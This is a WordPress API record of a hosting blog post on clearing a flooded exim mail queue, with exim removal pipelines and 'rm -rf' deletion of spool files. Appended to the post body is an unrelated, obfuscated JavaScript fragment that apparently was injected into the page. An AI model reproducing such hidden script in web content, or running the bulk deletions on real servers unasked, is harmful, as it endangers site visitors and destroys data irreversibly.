{"id":933,"date":"2022-03-24T20:55:26","date_gmt":"2022-03-24T20:55:26","guid":{"rendered":"https:\/\/hoganhost.com.ng\/blog\/?p=933"},"modified":"2024-08-12T13:34:28","modified_gmt":"2024-08-12T12:34:28","slug":"how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line","status":"publish","type":"post","link":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/","title":{"rendered":"How to delete millions thousands of exim mail queues using ssh command line"},"content":{"rendered":"<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full wp-image-934 aligncenter\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/03\/ssh.png\" alt=\"\" width=\"225\" height=\"225\" srcset=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/03\/ssh.png 225w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/03\/ssh-150x150.png 150w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><\/p>\n<p>We will work you through on How to delete millions thousands of exim mail queues using ssh command line, What will you do when some of your scripts are infected and injected with mail sending script.<\/p>\n<p>That sends millions of mails, curing the script is the first step and its easy too. but clearing the millions of mails on mail queue, that will be like pain in the a**<\/p>\n<p>There are few simple ways to clear the mail queues.<\/p>\n<p>To find the no of mails on the mail(exim) queue, use<br \/>\n<strong>exim -bpc<\/strong><br \/>\nThis command may take some time to display the result, which depends on the no of mails in the queue.<\/p>\n<p>First one is to delete whole queue, if its only few thousand mails.<br \/>\nUsing the\u00a0<em><strong>exim -bo<\/strong><\/em><\/p>\n<pre class=\"lang:sh highlight:0 decode:true\">exim -bp | grep \"&lt;\"|awk {'print $3'}|xargs exim -Mrm\r\n<\/pre>\n<p>You also try the below commands, which is categorized.<\/p>\n<p><em><strong>#Remove the frozen messages.<\/strong><\/em><\/p>\n<pre class=\"lang:sh highlight:0 decode:true\">exim -bpru|grep frozen|awk {'print $3'}|xargs exim -Mrm\r\n<\/pre>\n<p><em><strong>#Remove nobody mails<\/strong><\/em><\/p>\n<pre class=\"lang:sh highlight:0 decode:true\">exim -bpru|grep nobody|awk {'print $3'}|xargs exim -Mrm\r\n<\/pre>\n<p><em><strong>#Remove mail older than 1 day<\/strong><\/em><\/p>\n<pre class=\"lang:sh highlight:0 decode:true\">exiqgrep -o 86400 |awk {'print $3'}|xargs exim -Mrm\r\n<\/pre>\n<p>The above commands will clear the mails only when you keep the exim running.<br \/>\nthat will be the hard task and exim may create new mails to delivery.<\/p>\n<p>If the above commands didn\u2019t work for you, then the alternate way is to delete the mails manually.<\/p>\n<p>We have to do it in the hardway. ?<\/p>\n<p>Just stop the mail server by<\/p>\n<blockquote><p><strong>service exim stop<\/strong><\/p><\/blockquote>\n<p>then, change directory to \/var\/spool\/exim<\/p>\n<pre class=\"lang:sh highlight:0 decode:true\">cd \/var\/spool\/exim\r\n<\/pre>\n<p>Now, execute the below command, which will delete all the mails on the mail queue folder.<\/p>\n<pre class=\"lang:sh highlight:0 decode:true\">find input -type f -exec rm -rf {} \\;\r\n<\/pre>\n<p>Now, we also need to run the command for msglog folder too.<\/p>\n<pre class=\"lang:sh highlight:0 decode:true\">find msglog -type f -exec rm -rf {} \\;\r\n<\/pre>\n<p>Once done, start the mailserver exim.<\/p>\n<pre class=\"lang:sh highlight:0 decode:true\">service exim restart\r\n<\/pre>\n<p>I hope this helped you, check out our web <a href=\"https:\/\/hoganhost.com.ng\">hosting plan<\/a><br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>We will work you through on How to delete millions thousands of exim mail queues using ssh command line, What [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":934,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"default","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"default","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[11,32,5],"tags":[],"class_list":["post-933","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-server","category-ssh","category-whm"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>How to delete millions thousands of exim mail queues using ssh command line<\/title>\n<meta name=\"description\" content=\"We will work you through on How to delete millions thousands of exim mail queues using ssh command line, What will you do when\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"How to delete millions thousands of exim mail queues using ssh command line\" \/>\n<meta property=\"og:description\" content=\"We will work you through on How to delete millions thousands of exim mail queues using ssh command line, What will you do when\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/\" \/>\n<meta property=\"og:site_name\" content=\"HoganHost blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/facebook.com\/HoganHost\" \/>\n<meta property=\"article:published_time\" content=\"2022-03-24T20:55:26+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-08-12T12:34:28+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/03\/ssh.png\" \/>\n\t<meta property=\"og:image:width\" content=\"225\" \/>\n\t<meta property=\"og:image:height\" content=\"225\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Abigal okon\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@hoganhostng\" \/>\n<meta name=\"twitter:site\" content=\"@hoganhostng\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Abigal okon\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/\"},\"author\":{\"name\":\"Abigal okon\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a\"},\"headline\":\"How to delete millions thousands of exim mail queues using ssh command line\",\"datePublished\":\"2022-03-24T20:55:26+00:00\",\"dateModified\":\"2024-08-12T12:34:28+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/\"},\"wordCount\":280,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/03\/ssh.png\",\"articleSection\":[\"Server\",\"SSH\",\"whm\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/\",\"name\":\"How to delete millions thousands of exim mail queues using ssh command line\",\"isPartOf\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/03\/ssh.png\",\"datePublished\":\"2022-03-24T20:55:26+00:00\",\"dateModified\":\"2024-08-12T12:34:28+00:00\",\"description\":\"We will work you through on How to delete millions thousands of exim mail queues using ssh command line, What will you do when\",\"breadcrumb\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/#primaryimage\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/03\/ssh.png\",\"contentUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/03\/ssh.png\",\"width\":225,\"height\":225},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/hoganhost.com.ng\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"How to delete millions thousands of exim mail queues using ssh command line\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#website\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/\",\"name\":\"HoganHost blog\",\"description\":\"Keeping you connected to everything from HoganHost\",\"publisher\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/hoganhost.com.ng\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\",\"name\":\"HoganHost\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png\",\"contentUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png\",\"width\":466,\"height\":387,\"caption\":\"HoganHost\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/facebook.com\/HoganHost\",\"https:\/\/x.com\/hoganhostng\",\"https:\/\/instagram.com\/officialhoganhost\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a\",\"name\":\"Abigal okon\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g\",\"caption\":\"Abigal okon\"},\"sameAs\":[\"https:\/\/hoganhost.com.ng\/blog\"],\"url\":\"https:\/\/hoganhost.com.ng\/blog\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"How to delete millions thousands of exim mail queues using ssh command line","description":"We will work you through on How to delete millions thousands of exim mail queues using ssh command line, What will you do when","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/","og_locale":"en_US","og_type":"article","og_title":"How to delete millions thousands of exim mail queues using ssh command line","og_description":"We will work you through on How to delete millions thousands of exim mail queues using ssh command line, What will you do when","og_url":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/","og_site_name":"HoganHost blog","article_publisher":"https:\/\/facebook.com\/HoganHost","article_published_time":"2022-03-24T20:55:26+00:00","article_modified_time":"2024-08-12T12:34:28+00:00","og_image":[{"width":225,"height":225,"url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/03\/ssh.png","type":"image\/png"}],"author":"Abigal okon","twitter_card":"summary_large_image","twitter_creator":"@hoganhostng","twitter_site":"@hoganhostng","twitter_misc":{"Written by":"Abigal okon","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/#article","isPartOf":{"@id":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/"},"author":{"name":"Abigal okon","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a"},"headline":"How to delete millions thousands of exim mail queues using ssh command line","datePublished":"2022-03-24T20:55:26+00:00","dateModified":"2024-08-12T12:34:28+00:00","mainEntityOfPage":{"@id":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/"},"wordCount":280,"commentCount":0,"publisher":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#organization"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/#primaryimage"},"thumbnailUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/03\/ssh.png","articleSection":["Server","SSH","whm"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/","url":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/","name":"How to delete millions thousands of exim mail queues using ssh command line","isPartOf":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/#primaryimage"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/#primaryimage"},"thumbnailUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/03\/ssh.png","datePublished":"2022-03-24T20:55:26+00:00","dateModified":"2024-08-12T12:34:28+00:00","description":"We will work you through on How to delete millions thousands of exim mail queues using ssh command line, What will you do when","breadcrumb":{"@id":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/#primaryimage","url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/03\/ssh.png","contentUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/03\/ssh.png","width":225,"height":225},{"@type":"BreadcrumbList","@id":"https:\/\/hoganhost.com.ng\/blog\/server\/ssh\/how-to-delete-millions-thousands-of-exim-mail-queues-using-ssh-command-line\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hoganhost.com.ng\/blog\/"},{"@type":"ListItem","position":2,"name":"How to delete millions thousands of exim mail queues using ssh command line"}]},{"@type":"WebSite","@id":"https:\/\/hoganhost.com.ng\/blog\/#website","url":"https:\/\/hoganhost.com.ng\/blog\/","name":"HoganHost blog","description":"Keeping you connected to everything from HoganHost","publisher":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hoganhost.com.ng\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/hoganhost.com.ng\/blog\/#organization","name":"HoganHost","url":"https:\/\/hoganhost.com.ng\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png","contentUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png","width":466,"height":387,"caption":"HoganHost"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/facebook.com\/HoganHost","https:\/\/x.com\/hoganhostng","https:\/\/instagram.com\/officialhoganhost"]},{"@type":"Person","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a","name":"Abigal okon","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g","caption":"Abigal okon"},"sameAs":["https:\/\/hoganhost.com.ng\/blog"],"url":"https:\/\/hoganhost.com.ng\/blog\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/933","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/comments?post=933"}],"version-history":[{"count":1,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/933\/revisions"}],"predecessor-version":[{"id":935,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/933\/revisions\/935"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/media\/934"}],"wp:attachment":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/media?parent=933"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/categories?post=933"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/tags?post=933"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}